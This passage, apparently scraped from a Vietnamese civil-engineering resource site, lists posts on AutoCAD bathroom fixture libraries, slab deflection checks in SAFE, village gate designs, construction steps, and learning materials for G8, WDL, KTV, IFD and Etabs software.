tính năng và kích thước. Ưu điểm :  Mẫu mã và kích thước đa dạng, phù hợp với những không gian phòng tắm rộng rãi sang trọng tiện nghi. Tích hợp được nhiều tính tạo cảm giác thoải mái, thư giãn nhất cho người sử dụng. Nhược điểm : Kén chọn về diện tích, bồn tắm nằm có kích thước nhỏ nhất là 1m2. Chính vì vậy nhiều không gian phòng tắm nhỏ chật hẹp sẽ không thể lắp được loại bồn tắm này. 3. Bồn tắm góc Ưu và nhược điểm gần như giống với bồn tắm đứng tuy nhiên kiểu dạng và kích thước của bồn tắm góc có phần đa dạng hơn. Có thể tích hợp đầy đủ các hệ thống sục khí massage thư giãn. III. Các bản vẽ cad chi tiết nhà vệ sinh và phòng bếp Anh em có thể tham khảo thêm các mẫu thư viện cad nhà vệ sinh, phòng tắm như vòi hoa sen, vòi tắm âm trần. Các thiết bị trong khu vực nhà bếp cơ bản như các loại bếp: bếp gas, bếp điện, bếp từ. Một số loại tủ và chạn thường được sử dụng Tôi xin gửi đến anh em bản vẽ cad chi tiết các nhà vệ sinh tại đây. Trên đây tôi đã gửi đến anh em file Autocad các thiết bị vê sinh, nhà bếp được sử dụng cho dân thiết kế. Cũng như cùng tìm hiểu về các loại bồn vệ sinh, lavabo và các loại bồn tắm thông dụng. Rất cảm ơn anh em đã theo dõi bài viết và hẹn anh em ở những bài viết tiếp ! Anh em có thể tham khảo các tài liệu về xây dựng  tại Rdone Thư viện bàn ghế 2D đầy đủ phục vụ thiết kế Autocad các thiết bị vệ sinh bồn tắm dành cho dân thiết kế Sách học lập trình thiết kế auto lisp AutoCad Bộ thư viện Autocad dành cho ngành môi trường [Siêu hot] Nét vẽ chồng chéo nhau trong Autocad và cách sửa lỗi. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tính độ võng bằng SAFE - Tải trong tác dụng toàn phần
  Tính độ võng sàn BTCT bằng phần mềm SAFE – Trường hợp tải trọng tác dụng toàn phần Trong thiết kế, chúng ta luôn phải đảm bảo các cấu kiện đạt yêu cầu về độ bền ( TTGH thứ nhất) và biến dạng (TTGH thứ 2). Kết cấu sàn BTCT cũng không ngoại lệ, việc tính toán kiểm tra độ võng sàn là yêu cầu cần thiết để đảm bảo tính an toàn, kinh tế và thẫm mĩ cho công trình. Việc tính độ võng bằng SAFE cần lưu ý các yêu cầu sau: Tính toán theo TTGH thứ 2, tải trọng tiêu chuẩn không có hệ số vượt tải. Dưới tác dụng của tải trọng, xuất hiện vết nứt trong bê tông, làm độ cứng tiết diện và làm tăng độ võng. Để xét tới sự làm việc dài hạn của kết cấu BTCT, cần xét tới các yếu tố từ biến và co ngót cũng như tác dụng dài hạn của các loại tải trọng. Theo TCVN 5574-2012, độ võng toàn phần f được tính như sau: f = f1 – f2 + f3 f1 – độ võng do tác dụng ngắn hạn của toàn bộ tải trọng f2 – độ võng do tác dụng ngắn hạn của tải trọng dài hạn f3 – độ võng do tác dụng dài hạn của tải trọng dài hạn Gửi các bạn mô hình SAFE dùng cho ví dụ này: SAFE TÍNH VÕNG SÀN – PHẦN 1 Sau đây là nội dung chi tiết: Bước 01: Xây dựng mô hình tính độ võng bằng SAFE Các bạn có thể dựng mô hình trực tiếp trong phần mềm SAFE hoặc xuất mô hình (dưới dạng file .f2k) từ ETABS qua. Cần tính toán kiểm tra sàn tầng nào thì xuất tầng đó. Với các phiên bản ETABS mới thì mình thường sử dụng ETABS để tính luôn. Cách xuất mô hình từ ETABS sang SAFE mình đã thể hiện rất rõ trong bài viết Tính thép sàn BTCT bằng SAFE V12 Các loại tải trọng dùng để tính toán cũng giống như khi tính thép sàn nhé. Bao gồm các loại tải trọng tác dụng thẳng đứng: Tải trọng bản thân (Dead) Tải trọng hoàn thiện (SDL) Tải trọng tường xây, đất bồn hoa,…. (WALL, SOIL,…) Hoạt tải sử dụng (LIVE1, LIVE2) 2. Lựa chọn tiêu chuẩn tính độ võng bằng SAFE Ở đây mình sẽ tính toán với tiêu chuẩn Eurocode 2 – 2004. Các bạn nhấn Design =&gt; Design Preferences Nhấn OK để kết thúc. 3. Khai báo đặc trưng vật liệu Nhấn Define =&gt; Materials Chọn MAT1 =&gt; Modify / Show Material…Ở đây MAT1 chính là tên đã được thay đổi của vật liệu bê tông bên ETABS. Các bạn so sánh với bên ETABS để thấy rõ hơn nhé. Vật liệu bê tông B25 – ETABS Vật liệu bê tông B25 (đổi thành MAT1) – SAFE Các thông số chính các bạn giữ nguyên không thay đổi gì cả. Chỉ khai báo bổ sung thêm Cường độ chịu kéo trung bình của bê tông ở tuổi 28 ngày – fctm Ở phần Modulus of Rupture for Cracked Deflections, các bạn chọn phần nào cũng được: + Program Default (Based on Concrete Slab Desigh Code): để phần mềm tự tính toán theo tiêu chuẩn vừa rồi mình đã khai báo ở phần trên. + User Specified: người dùng khai báo, mình hay chọn cái này Với bê tông cấp độ bền B25, ta có fctm = 2.2 N/mm2 Với các loại bê tông cấp độ bền khác các bạn tham khảo bảng Thông số Fctm nhé. 4. Khai báo tác dụng của vết nứt, ảnh hưởng của cốt thép Nhấn Run =&gt; Cracking Analysis Options =&gt; Quick Tension Rebar Specification Các bạn dự đoán cốt thép sẽ sử dụng trong sàn hoặc có thể tính toán cốt thép sàn trước để khai báo vào mục này nhé. Ở đây mình đang thép sàn có đường kính d12. + Top Reinforcing: Thép lớp trên. Độ võng lớn nhất là khu vực giữa sàn, nên không kể đến lớp thép gia cường + Bottom Reinforcing: Thép lớp dưới. Kể đến khoảng cách thép nhỏ nhất ở khu vực giữa sàn Phần Minimum Reinforcing Ratios Used for Cracking Analysis: hàm lượng cốt thép tối thiểu để tính toán μ = As / b.h Trong đó: μ: hàm lượng cốt thép, tính với khối lượng thép mình vừa khai báo ở trên As: diện tích cốt thép bố trí trong dải sàn có bề rộng 1m b: tính cho dải sàn có bề rộng 1m h: chiều dày tiết diện sàn, ở đây mình tính với chiều dày sàn là 18 cm Ta có: μ = 0.003 Mình lập sẵn công thức tính hàm lượng bằng excel, các bạn tham khảo tại đây nhé. 5. Khai báo tổ hợp tải trọng Nhấn Define =&gt; Load Cases… =&gt; Add New Case… + f1: độ võng do tác dụng ngắn hạn của toàn bộ tải trọng + f2: độ võng do tác dụng ngắn hạn của tải trọng dài hạn Theo TCVN 2737-1995, hoạt tải có 2 thành phần: toàn phần và dài hạn. Phần dài hạn thường chiếm 20%-30% giá trị phần toàn phần. Để thuận tiện, trong bài viết của mình xin dùng hệ số là 0.3 Nếu bạn nào muốn chính xác hơn, xem phần tải trọng tác dụng ở phần đầu TCVN 2737-1995, lấy phần dài hạn chia cho phần toàn phần là ra hệ số nhé. + f3: độ võng do tác dụng dài hạn của tải trọng dài hạn Tổ hợp này kể đến tác dụng dài hạn của tải trọng dài hạn, dùng 2 đặc trưng Creep Coefficient (CR) cho từ biến và Shrinkage (SH) cho co ngót của bê tông. Với bê tông cấp độ bền B25, sàn dày 180mm, bề rộng dải tính b = 1000mm: Có CR = 1.074, SH = 0.00002445 Các bạn xem thêm bài viết “Từ biến và biến dạng co ngót – Creep and Shrinkage strain” để biết cách xác định 2 thành phần này nhé! + Tổ hợp tải trọng tính toán độ võng Nhấn Define =&gt; Load Combinations… =&gt; Add New Combo… 6. Phân tích mô hình Nhấn Run =&gt; Run Analysis &amp; Design và chờ đợi mô hình phân tích xong Nhấn Display =&gt; Show Deformed Shape… để xem biểu đồ biến dạng của kết cấu sàn Chọn tổ hợp tải trọng tính võng, các bạn xem trực tiếp giá trị võng ngay tại đây. Vùng tối màu nhất thể hiện độ võng lớn nhất. Hoặc xem giá trị bằng số ở góc màn hình. a. Phân tích độ võng Như vậy độ võng lớn nhất của mình là Δ = -31.569mm + Theo phương LX: Gọi ∆X1, ∆X2 là độ võng tại 2 điểm X1, X2 (điểm tại 2 biên sàn – các bạn di chuột đến các điểm này sẽ được giá trị độ võng, lấy tương đối là được). Ta có độ võng tương đối của ô sàn theo phương LX là: ∆X = ∆ – 0,5.(∆X1 + ∆X2) + Theo phương LY: Gọi ∆Y1, ∆Y2 là độ võng tại 2 điểm Y1, Y2 (điểm tại 2 biên sàn – các bạn di chuột đến các điểm này sẽ được giá trị độ võng, lấy tương đối là được). Ta có độ võng tương đối của ô sàn theo phương LY là: ∆Y = ∆ – 0,5.(∆Y1 + ∆Y2) + Theo phương chéo LXY: Gọi ∆XY1, ∆XY2 là độ võng tại 2 điểm XY1, XY2 (điểm tại 2 đầu nút sàn. Thường thì 2 đầu này là điểm cột, vách. Và có chuyển vị bằng ∆XY1 = 0, ∆XY2 = 0). Ta có độ võng tương đối của ô sàn theo phương LY là: ∆XY = ∆ – 0,5.(∆XY1 + ∆XY2) b. Kiểm tra độ võng Độ võng giới hạn của các cấu kiện thông dụng các bạn xem Bảng 4, TCVN 5574-2012. Kết cấu sàn thỏa mãn điều kiện độ võng khi Δ &lt; [Δ] Chú ý: Vùng có độ võng Δ = -44.249mm là phần conson được được đỡ bởi tường gạch, nên mô hình không được trực quan lắm. Các bạn bỏ qua phần này nhé. Gửi các bạn mô hình SAFE dùng cho ví dụ tính độ võng bằng SAFE: Tải về Mình đã giới thiệu xong phương pháp tính độ võng bằng SAFE – Trường hợp tải trọng tác dụng toàn phần theo tiêu chuẩn Eurocode 2 – 2004. Nguồn: Tài liệu xây dựng Ngoài ra các bạn có thể tham khảo thêm các tài liệu về xây dựng khác của page. Thiết kế sàn BTCT bằng SAFE Tính độ võng sàn vs trường hợp tải trọng theo thời gian Thiết kế sàn BTCT bằng safe mới nhất hiện nay Cảm ơn các bạn đã thẹo dõi bài viết của mình !!!
 • Mẫu thiết kế cổng làng đẹp nhất 2022 với file CAD đầy đủ
  1.MỤC ĐÍCH SỬ DỤNG Cổng làng là sản phẩm kiến trúc của người Việt, nó mang  giá trị thực tế và giá trị tâm linh trong đời sống của con người từ xưa tới nay. Cổng làng phân chia ranh giới giữa phần đất canh tác và phần đất được sử dụng làm đất ở. Cổng làng cũng là điểm báo hiệu cho người ngoài biết ranh giới giữa các làng ở các vùng quê. Trên cơ sở đó chúng tôi đã đưa ra thư viện cad 2D thiết kế cổng làng phù hợp nhất. 2.VỊ TRÍ XÂY DỰNG Cổng làng thường được xây đầu làng có thể xây dựng trên nền cổng làng cũ, hoặc xây dựng ở vị trí khác tùy vào phong  tục, đặc trưng văn hóa của làng mỗi làng. 3. GIẢI PHÁP THIẾT KẾ 3.1. GIẢI PHÁP KIẾN TRÚC Cổng làng cho người công giáo Với sự thoáng đạt về tư duy kiến trúc, kết cấu không phải là vấn đề yêu cầu lớn, các mẫu thiết kế cổng làng (giáo xứ) được thể hiện đơn giản là hình khối, các chi tiết đặc trưng, thể hiện cho sự hiện hữu của văn hóa công giáo phổ biến là chữ thập thánh giá, cánh chim bồ câu thể hiện hòa bình hay các họa tiết trang trí mang đậm phong cách châu âu thời kỳ phục hưng. Cổng làng cho người Mường Với họa tiết trang trí đặc trưng cho văn hóa Mường, kết cấu không cầu kỳ, các khoảng trống được bố trí để sử dụng các họa tiết theo ý muốn của địa phương. Cổng làng cho người Kinh. Với 5 mẫu thiết kế cổng làng phù hợp thể hiện nét văn hóa từ truyền thống đến hiện đại, từ đơn giản đến phức tạp. Các mẫu này sẽ là cơ sở để thiết kế và xây dựng cổng các làng văn hóa, ta dễ dàng điều chỉnh qui mô, kích thước hình học tùy thuộc vào thực địa bố trí công trình cũng như yêu cầu về nét riêng, đặc trưng của mỗi địa phương.. 3.2.GIẢI PHÁP KẾT CẤU Các hạng mục công trình được thiết kế và dự toán thiết kế cơ sở từ cốt ± 0.00 trở lên, từng xã trên địa bàn Tỉnh cần có công tác khảo sát để có giải pháp thiết kế phần móng phù hợp với địa chất tại khu vực xây dựng công trình Loại kết cấu 1: Cổng xây dựng bằng kết cấu bê tông cốt thép, dán gạch, lắp ghép hoa văn họa tiết trang trí, có thể sử dụng sơn hoặc quét vôi bề mặt Loại kết cấu 2: Sử dụng kết cấu khung thép. 3.3.GIẢI PHÁP THIẾT KẾ CHIẾU SÁNG – ĐIỆN Sử dụng đèn compact tiết kiệm điện nếu có. 4.HÌNH ẢNH MẪU THIẾT KẾ CỔNG LÀNG Để tải các mẫu thiết kế vui lòng truy cập theo link tại đây. Các bài viết có thể liên quan: Mẫu công trình kết cấu thép Autocad các thiết bị vệ sinh bồn tắm dành cho dân thiết kế Bộ thư viện Autocad dành cho ngành môi trường [Siêu hot] Biện pháp làm sạch gỉ thép trong xây dựng Đồ án thép 2 đầy đủ hướng dẫn chi tiết. Các bạn có thể tham khảo thêm các bài viết khác tại  rdoneCảm ơn các bạn đã theo dõi page của chúng tôi.Chúc các bạn thành công!
 • Các bước thi công kết cấu công trình mới nhất 2022
  CÁC BƯỚC THI CÔNG KẾT CẤU Thi công kết cấu là công tác tạo ra các kết cấu chịu lực chính của công trình. Công tác này đòi hỏi kĩ sư, công nhân cần có những kiến thức chuyên môn để tạo ra những công trình vững trắc. Để khái quát sơ qua về các công việc của thi công kết cấu chúng tôi sẽ đem đến cho các bạn đọc đầy đủ các bước để mọi người đễ dàng tham khảo. Các bước bao gồm : TỔ CHỨC BỘ MÁY BCH CÔNG TRƯỜNG. TỔ CHỨC MẶT BẰNG THI CÔNG. BIỆN PHÁP THI CÔNG. MÁY MÓC , THIẾT BỊ THI CÔNG.SẮP XẾP CÁC TỔ NHÓM THI CÔNG. ĐỊNH MỨC THI CÔNG. TIẾN ĐỘ THI CÔNG. CÁC CÔNG TÁC TRONG THI CÔNG PHẦN THÔ. TRIỂN KHAI BẢN VẼ . THI CÔNG TẦNG HẦM . THI CÔNG MÓNG. THI CÔNG CỘT. THI CÔNG DẦM, SÀN. THI CÔNG VÁCH BẰNG CỐP PHA THƯỜNG. THI CÔNG VÁCH BẰNG HỆ DOKA. THI CÔNG THANG BỘ. CÔNG TÁC THÉP. CÔNG TÁC CỐP PHA. CÔNG TÁC BÊ TÔNG. CÔNG TÁC VỆ SINH. Các bước trên có thể thay đổi tùy thuộc vào công trình và mục đích sử dụng. Các phụ lục chi tiết và một số hình ảnh minh họa: 1. TỔ CHỨC BỘ MÁY BCH CÔNG TRƯỜNG. 1.1 Bố trí đường tạm cho công trường. Bố trí đường tạm các yêu cầu cần lưu ý : - Đường tạm phải có kết cấu  tốt để phục vụ trong suốt quá trình thi công công trình. - Đường phải có hệ thống thoát nước tạm chống ngập vào khi mưa xuống. - Thuận tiện cho vận chuyển vật tư và thiết bị chuẩn bị cho thi công... 1.2 Văn phòng của Ban chỉ Huy. Văn phòng phải bố trí: -Thuận tiện lối ra vào, thuận tiện cho công tác giao dịch với đối tác. -Thuận tiện việc quan sát, kiểm soát toàn bộ  công trường. -Gọn gàng, sạch sẽ, cách biệt với lán trại đội thi công... 1.3 Lán trại đội thi công. Bố trí lán trại đội thi công  cần chú ý: - Không nên nằm trên vị trí khu đất của các hạng mục xây dựng của công trình. -Thuận tiện cho tập kết vật tư, thiết bị cũng như lối đi lại của đội thi công đến công trường. -Gọn gàng, sạch sẽ và nằm trong tầm kiểm tra của BCH... Để xem đầy đủ nội dung chi tiết xin mời truy cập tại đây. Nguồn :coteccons. Các bạn có thể tham khảo thêm các bài viết khác tại  rdone  Giáo trình tự học 3DS MAX hay nhất 2020. Tài liệu học ADAPT – Phần mềm thiết kế dầm, sàn ứng suất trước. Tài liệu học Revit Structure cơ bản cho người mới sử dụng. Giáo trình hướng dẫn đo bóc khối lượng lập dự toán xây dựng. Tài liệu xây dựng mô hình kết cấu BTCT bằng Etabs 2017. Cảm ơn các bạn đã theo dõi page của chúng tôi.Chúc các bạn thành công!
 • Tự học dự toán G8 - phần mềm dự toán G8 có Video
  Tự học Dự toán G8 có video hướng dẫn Hôm nay mình sẽ chia sẽ cho các bạn video và tài liệu tự học phần mềm Dự toán G8 Phần mềm này có bản miễn phí dùng thử là G8-Express Còn các bản khác có nhiều tính năng hơnG8 – Professional giá 3.000.000 đ.G8 – Enterprise.giá 4,000,000 đ G8 Beginner giá 2,000,000 đ. G8 – Amateur giá 1,000,000 đ. Ưu điểm Cập nhật các đơn giá thường xuyên của các tỉnh thành thành phố. Những sai lệnh được xử lý rất tốt. Phần mềm hoạt động tốt, font không bị lỗi. + Giao diện dễ dùng. Giống như giao diện của excel Lập dự thầu, dự toán và làm thanh toán, quyết toán theo mẫu Thông tư 08/2016-Bộ tài chính, Thông tư 86/2011-Bộ tài chính phạm vi áp dụng đầy đủ các lĩnh vực Xây Dựng có định mức của Bộ Xây Dựng (1776,1777,1778,1129,1091,1172,1173,587,588…) + Lập các đơn giá, vẽ biểu đồ xuất sang autocad, bù giá nhiên liệu và tính bù lương công nhân, cước vận chuyển theo Thông tư 01/2015- Bộ xây dựng, tính giá ca máy theo Thông tư 06/2010 - Bộ xây dựng và Định mức 1134/2015 Bộ xây dựng , thẩm định đơn giá định mức + Cập nhật đầy đủ TT 04/2010- BXD, nghị định 32/2015 NĐ-CP, QĐ 957/2009-BXD, TT 19/2011-BTC…. + Chiết tích, dự thầu cho doanh nghiệp + Xuất file sang excel dễ dàng với các loại định dạng + Các công trình từ excel có thể nhập vào để thẩm định. + Các đơn giá của 64 tỉnh thành được cập nhật liên tục. Nhược điểm Phần mềm không thể in mà phải xuất ra excel để in. Cập nhật thông tin từ Chính phủ chưa được linh hoạt (nhưng người dùng có thể tự cập nhật). Trên đây là một vài giới thiệu về phần mềm để các bạn hiểu rõ hơn về phần mềm. Các bạn có thể tải tài liệu và video tại link sau: Tải tài liệu: Tải về Tải video: Tải về Ngoài ra các bạn có thể tham khảo thêm các tài liệu khác của Rdone Các bài viết có thể liên quan Phần mềm dự toán miễn phí Tài liệu lập dự toán công trình xây dựng Tài liệu dự toán xây dựng thực hành. Cảm ơn các bạn đẽ theo dõi bài viết. Chúc các bạn thành công !!!
 • Tài liệu học WDL-Tính toán tải trọng gió chuẩn nhất
  Tài liệu học WDL Các bạn có thể tìm thấy rất nhiều tài liệu học WDL - tính toán tải trọng gió trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm WDL - tính toán tải trọng gió WDL là phần mềm tính toán tải trọng Gió với các đặc điểm sau: Tính toán tải trọng Gió tĩnh đối với kết cấu tự nhập thông số (cho nhà thấp tầng không yêu cầu tính thành phần động của tải trọng Gió) Tính toán tải trọng Gió tĩnh và Gió động đối với dữ liệu xuất ra từ Etabs (cho nhà cao tầng) Tính toán theo tiêu chuẩn TCVN 2737:1995 và TCXD 229:1999 Xuất thuyết minh tính toán tải trọng gió ra bảng tính Excel Giao diện đơn giản dễ sử dụng Ưu điểm: Tự động tra các thông số khi được cung cấp dữ liệu đầu vào Tự động đọc dữ liệu từ Etabs một các nhanh chóng và chính xác Tránh được các sai sót mà khi thao tác trong Excel có thể mắc phải 2. Thông tin cập nhật 28.11.2019 - Cập nhật chức năng thay đổi hệ số khí động C. 23.11.2019 - Sửa lỗi xác định Ci khi Epxilon vượt quá giá trị giới hạn trong bảng tra (tính thành phần động). 02.10.2018 - Tự kích thước mặt bằng, tải trọng gió tác dụng lên KC phụ trên mái v.v.. 19.12.2017 - Cập nhật chức năng tự động thay đổi hệ số an toàn theo số tầng. 03.07.2015 - Cập nhật địa danh hành chính theo Quy chuẩn QCVN 02-2009/BXD 02.06.2015 - Chức năng thay đổi hệ số độ tin cậy của tải trọng Gió 24.05.2015 - Chức năng cho phép chọn mẫu file Excel để xuất kết quả tính toán 07.04.2015 - Sửa lỗi cho trường hợp một số tầng không được gán Diaphragm 04.10.2014 - Bổ sung chức năng nhập dữ liệu từ mô hình 3D 16.04.2013 - Bổ sung thông tin vị trí tâm khối lượng 22.10.2012 - Bổ sung thông tin dạng địa hình vào thuyết minh 07.10.2012 - Bổ sung lựa chọn dạng địa hình 06.09.2012 - Bổ sung chức năng giảm tải gió đối với các vùng I-A, II-A, III-A 04.09.2012 - Sửa lỗi đọc dữ liệu 3. Giới thiệu tài liệu học sử dụng phần mềm WDL - tính toán tải trọng gió Sau đây mình giới thiệu các bạn về tài liệu học sử dụng WDL. Tài liệu gồm 10 chương: Chương 1: Cơ sở lý thuyết Chương 2: Cửa sổ khởi động nhanh Chương 3: Quy trình tính toán Chương 4: Thiết lập thông tin về địa điểm xây dựng Chương 5: Thiết lập phương pháp tính toán thành phần tĩnh Chương 6: Thiết lập thông tin kết cấu trên mái Chương 7: Thiết lập thông tin công trình Chương 8: Tính toán Chương 9: Xuất kết quả Chương 10: Nhập tải trọng vào phần mềm Etabs Các bạn có thể đến với ketcausoft.com để sử dụng phần mềm. Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm WDL tính toán tải trọng gió tại đây nhé ! Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Giáo trình tự học 3DS MAX hay nhất 2020. Giáo trình học phần mềm SolidWord [siêu hot]. Giáo trình học Revit MEP thiết kế cơ khí – Điện – Nước. Tài liệu học Tekla Structures, đầy đủ và mới nhất 2020. Tài liệu học Revit Structure cơ bản cho người mới sử dụng. Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo!
 • Tính toán vách cứng - Tài liệu học KTV [Siêu hot]
  Tài liệu học KTV - tính toán vách cứng Các bạn có thể tìm thấy rất nhiều tài liệu học KTV - tính toán vách cứng trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone&nbsp;thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm KTV - tính toán vách cứng KCS KTV là phần mềm kiểm tra khả năng chịu lực của Vách với các đặc điểm sau: Sử dụng phương pháp xây dựng biểu đồ tương tác cho cấu kiện chịu lực tổng quát theo TCVN 5574-2012Giao diện đồ họa cơ động cộng với công cụ nhập dữ liệu từ AutoCAD cho phép xây dựng tiết diện bất kỳHỗ trợ khai báo nhanh các tiết diện Chữ Nhật, tiết diện chữ L, và tiết diện chữ T, vách thang máyHỗ trợ nhập nội lực từ EtabsXuất thuyết minh tính toán sang định dạng PDF 2. Thông tin cập nhật 16.10.2018: Bổ sung chức năng nhận dạng cốt thép bằng đối tượng Circle trong AutoCAD09.10.2018: Sửa lỗi hiệu chỉnh tải trọng13.08.2018: Sửa lỗi xuất file PDF khi sử dụng chức năng phân nhóm đường kính thép25.06.2018: Bổ sung chức năng phân nhóm và thay đổi đường kính cốt thép theo tầng v.v..18.06.2018: Bổ sung chức năng thiết lập khi xuất file PDF, bao gồm Header, Footer, rút ngắn dữ liệu v.v..05.09.2017: Bổ sung chức năng kiểm tra tỉ số nén16.06.2017: Sửa lỗi thể hiện Point và nhận diện vùng nén11.05.2017: Sửa lỗi thể hiện BDTT trong file PDF20.04.2017: Sửa lỗi nội suy27.03.2017: Bổ sung chức năng điều chỉnh khoảng cách cốt thép và Bổ sung các phím tắt cho các chức năng chính,22.03.2017: Sửa lỗi đọc vật liệu và Chức năng thông báo cập nhật 3. Giới thiệu tài liệu học sử dụng phần mềm KTV - tính toán vách cứng&nbsp; Sau đây mình giới thiệu các bạn về tài liệu học sử dụng KTV. Tài liệu gồm 8 phần(bao gồm cả phần mở đầu): Phần mở đâu - Cơ sở tính toánPhần 1 - Các bước thực hiện tính toánPhần 2 - Xây dựng tiết diệnPhần 3 - Khai báo tải trọngPhần 4 - Kiểm tra khả năng chịu lực của tiết diệnPhần 5 -&nbsp; Xuất kết quảPhần 6 -&nbsp; Một số chức năng khác của phần mềmPhần 7 - Các phím tắt Các bạn có thể đến với ketcausoft.com để sử dụng phần mềm. Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm KTV kiểm tra cốt thép vách đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Giám sát bê tông và bê tông cốt thép - Tài liêu thi công hayGiám sát công trình đường ôtô với sổ tay tư vấn chuẩn nhất 2020Thiết kế sàn bê tông cốt thép bằng phần mềm SAFETính toán đài cọc bằng SAFETính toán móng cẩu tháp trong xây dựng Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công
 • Thiết kế móng đơn - Tài liệu học phần mềm IFD [Mới nhất]
  Tài liệu học IFD Các bạn có thể tìm thấy rất nhiều tài liệu thiết kế móng đơn trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm IFD - thiết kế móng đơn KCS IFD là phần mềm thiết kế móng đơn, giao diện đồ họa trực quan, dễ thao tác và sử dụngKCS IFD bao gồm các chức năng chính như sau: Nhập nội lực từ file (*.mdb") xuất ra bởi EtabsTính toán phương án móngTính toán và xuất thuyết minh tính toán cốt thép sang file Excel cho móng 2. Thông tin cập nhật 07.10.2019: Hàng hoạt chức năng quan trọng như thay đổi cách xác định kích thước móng dựa vào moment, nhập dữ liệu từ file MDB của SAP v.v..18.10.2018: Bổ sung chức năng đọc dữ liệu từ SAP, chi tiết xem tại:10.05.2017 - Bổ sung chức năng đọc dữ liệu địa chất từ file khác...29.02.2016 - Sửa lỗi xuất dữ liệu độ lún khi khai báo lớp đất dày...10.05.2015 - Sửa lỗi đọc dữ liệu từ Etabs 201306.11.2014 - Sửa lỗi nhận tiết diện cột Cx và Cy26.10.2014 - Bổ sung menu&nbsp;Công cụ&nbsp;&gt;&nbsp;Thiết lập các thông số: Chức năng cho phép người dùng hiệu chỉnh các thông số mặc định như: đặc trưng đệm cát, hệ số tính toán cường độ nền đất v.v... 3. Giới thiệu tài liệu học IDF - thiết kế móng đơn Sau đây mình giới thiệu các bạn về tài liệu học sử dụng IDF - phần mềm thiết kế móng đơn. Tài liệu gồm 7 phần: Phần 1: Quy trình sử dụngPhần 2: Quy ước về ký hiệuPhần 3: Nhập kích thước mặt bằngPhần 4: Nhập kích thước giằng móngPhần 5: Nhập thông tin về cốt thépPhần 6: Nhấp thông tin về trục định vịPhần 7: Bu lông chờ trong móng Các bạn có thể đến với ketcausoft.com để sử dụng phần mềm. Tôi gửi các bạn tài liệu hướng dẫn sử dụng phần mềm IFD triển khai chi tiết móng đơn đây nhé ! Xin cảm ơn các bạn đã theo dõi bài viết của mình. Hẹn gặp lại các bạn ở những bài viết tiếp theo! Các bạn có thể tham khảo thêm các bài viết khác về xây dựng tại Rdone Tài liệu học KTV-Phần mềm kiểm tra cốt thép vách. Tài liệu học WDL-Tính toán tải trọng gió chuẩn nhất. Thiết kế khung thép tiền chế – Tài liệu học phần mềm STF.Triển khai cốt thép sàn – Tài liệu học phần mềm RCS.Tài liệu tự học Etabs 2017 hay, đơn giản cho người mới dùng. Cảm ơn các bạn đã đồng hành cùng Rdone. Chúc các bạn thành công!
 • Tài liệu tự học Etabs 2017 hay, đơn giản cho người mới dùng
  Tài liệu tự học Etabs 2017 Các bạn có thể tìm thấy rất nhiều Tài liệu tự học etabs 2017 trên mạng với thời đại công nghệ thông tin hiện nay. Nhưng tìm được tài liệu đầy đủ, chi tiết và siêu hot nữa thì chỉ có ở Rdone thôi nhé! Bài viết dưới đây chúng tôi sẽ giới thiệu đến cho các bạn tài liệu về phần mềm này. Mời các bạn tham khảo! Nguồn: ketcausoft.com 1. Giới thiệu phần mềm - tài liệu tự học Etabs 2017 Etabs phần mềm mô hình, phân tích và thiết kết kết cấu nhà cao tầng. Với trên 40 năm không ngừng nghiên cứu và phát triển, Etabs mới nhất với khả năng mô phỏng và mô hình hóa thiết kế 3D hiện đại nhất từ trước tới nay. Với công nghệ phân tích tuyến tính và phi tuyến, hỗ trợ nhiều loại vật liệu, xuất thuyết mình, bản vẽ chi tiết một cách nhanh chóng, dễ dàng kiểm tra kết quả phân tích và thiết. Hố trợ nhiều tiêu chuẩn thiết kế trên toàn cầu như tiêu chuẩn Mỹ, Chau Âu, Trung Quốc, Nhật, Anh... 2. Giới thiệu tài liệu Tài liệu này được biên dịch dựa trên tài liệu gốc của CSI. Nhằm giúp người dùng nắm được các bước để xây dựng một mô hình kết cấu bê tông kết cấu bê tông cốt thép trong Etabs phiên bản 17(cũng như các phiên bản từ 2013 trở lên). Một số nội dung đã được điều chỉnh hoặc bổ sung ghi chú nhằm mục đích giúp người đọc dễ hình dung hơn. Phần ví dụ tính toán cốt thép được thay thế bằng phần ví dụ về xuất dữ liệu ra file excel để phục vụ các công tác tính toán theo tiêu chuẩn Việt Nam do hiện tại phần Design theo TCVN trong Etabs chưa hoàn thiện Tài liệu này chủ yếu hướng đến những người chưa tiếp xúc nhiều với Etabs, đặc biệt là các bạn sinh viên ngành xây dựng đang trong quá trình làm đồ án tốt nghiệp. Tài liệu gồm 9 bước để xây dựng mô hình kết cấu bê tông cốt thép bằng Etabs 2017: Bước 1: Thiết lập cơ bản cho cấu kiện Bước 2: Vẽ lỗ mở sản Bước 3: Vẽ vách Bước 4: Khai báo tải trọng và tổ hợp tải trọng Bước 5: Kiểm tra Diaphragms Bước 6: Kiểm tra các trường hợp tải Bước 7: Chạy phân tích Bước 8: Xem kết quả phân tích Bước 9: Xuấy kết quả nội lực Tôi gửi các bạn tài liệu 